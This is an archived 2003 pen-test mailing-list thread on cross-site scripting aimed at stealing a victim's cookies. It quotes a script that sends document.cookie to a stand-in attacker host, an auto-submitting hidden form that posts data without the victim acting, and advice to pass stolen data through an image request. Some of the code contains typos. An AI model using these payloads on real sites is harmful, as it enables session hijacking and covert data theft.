Pantek Library
Hosting Provided By
CybrHost
High Speed Hosting
Mailing Lists: securityfocus.com > pen-test > 03 > 040586.html (Request Expert securityfocus.com Support)

RE: Proof of Concept Tool on Web Application Security

From: Dawes, Rogan (ZA - Johannesburg) <rdawes(at)deloitte.co.za>
Date: Wed Apr 16 2003 - 11:53:35 EDT


This is a little cumbersome, and relies on being able to insert your script into the header, I think. Additionally, you don't always get the opportunity to determine where your scritp will end up. Sometimes it is already in the middle of a form, and you can't have nested forms in HTML.

The simplest way is just to insert an image tag, that requests an image from a site under your control, and passes the data as a parameter after the image file name. That way, as the HTML page is parsed by the browser, the image will automatically be retrieved from your server, and the data desired sent to you as part of the request.

-----Original Message-----
From: Jon Pastore [mailto:jpastore@idetech.net] Sent: 16 April 2003 01:10 PM
To: Indian Tiger
Cc: pen-test@securityfocus.com
Subject: Re: Proof of Concept Tool on Web Application Security

you are a little beyond me but I would like to know more about this...but as far as automated submitting that's easy:

<script lanaguage=javascript>
function sendmedata()
{

    documet.thiefme.submit();
}
</script>
<body onLoad="sendmedate();">
<form method=post name=thiefme action="you_know_better_then_me.cgi">

    <input type=hidden name=goods value="the data you populated">
</form>

----- Original Message -----
From: "Indian Tiger" <indiantiger@mailandnews.com> To: <pen-test@securityfocus.com>; <rdawes@deloitte.co.za> Sent: Sunday, April 13, 2003 3:33 AM
Subject: RE: Proof of Concept Tool on Web Application Security

Hi Rogan,

Do you need help?X

Comments in-line

[script language=javascript]document.print("<img src='http://attacker.site/snarf?" + document.cookie + "'>")[/script]

I have tested this and it works perfectly fine. In my scenario I gave as follows and it was working:
<script> alert('hacked') </script>

Now I am testing Cross-Site Scripting to steal the client cookies, or any other sensitive information. I am working on my own pen-test-testing site, which is vulnerable to XSS. I was able to display the cookies of the client at
the victim's machine, but that was not my goal, my goal is to get that cookies
on my machine or any desired location. So is there any way by which I can transfer the victim's cookie or any other information at my machine without interaction of the victim.

One way of transferring cookie information from the victim's machine to attacker's machine is to create a hidden filed & then transfer cookie information to that hidden field & then post (submit) this hidden field to web
site of attacker. But this require interaction of victim, as victim must click
on submit button to post this data to attacker's site, which is not a good idea, the data should be transferred without knowledge of victim. So what should be the best way to this? How I can upload a file from victim machine to
any other server?

Any suggestions on the above topics will be highly appreciated.

Thanking you,
Sincerely,

Indian Tiger, CISSP


Costs are climbing and complaints are rising as SPAM overloads your e-mail servers and Inboxes SurfControl E-mail Filter puts the brakes on spam & viruses and gives you the reports to prove it.
http://www.securityfocus.com/SurfControl-pen-test2 Download a free trial and see just
what's going in and out of your organization.

Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the world's premier event for IT and network security experts. The two-day Training features 6 hand-on courses on May 12-13 taught by professionals. The two-day Briefings on May 14-15 features 24 top speakers with no vendor sales pitches. Deadline for the best rates is April 25. Register today to ensure your place. http://www.securityfocus.com/BlackHat-pen-test

Attend Black Hat Briefings & Training Europe, May 12-15 in Amsterdam, the world's premier event for IT and network security experts. The two-day Training features 6 hand-on courses on May 12-13 taught by professionals. The two-day Briefings on May 14-15 features 24 top speakers with no vendor sales pitches. Deadline for the best rates is April 25. Register today to ensure your place. http://www.securityfocus.com/BlackHat-pen-test
Received on Wed Apr 16 13:05:44 2003
Do you need more help?X

This archive was generated by hypermail 2.1.8 : Wed Aug 23 2006 - 14:02:35 EDT

Contact Us  Legal Notices  Order Services Online 
Pantek Home  Privacy Policy  IT news  Site Map  Pantek Library